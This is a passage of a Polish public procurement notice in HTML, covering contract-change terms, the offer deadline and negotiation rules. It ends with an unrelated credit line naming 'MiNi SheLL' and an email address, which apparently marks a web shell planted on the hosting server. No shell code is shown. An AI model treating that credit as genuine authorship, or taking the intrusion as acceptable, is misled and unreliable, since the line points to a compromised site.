class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający dopuszcza zmianę treści wzoru umowy po negocjacji z oferentem, który złożył najkorzystniejsza ofertę.<br/>2. Zamawiający przewiduje zmianę treści umowy w zakresie terminu jej obowiązywania oraz rozszerzenia usług na Zamiejscowy Wydział Ksiąg Wieczystych w Czarnkowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Portal ezamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-06 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 60 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">2</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Ilość punktów uzyskanych w trakcie oceny ofert

Creat By MiNi SheLL
Email: jattceo@gmail.com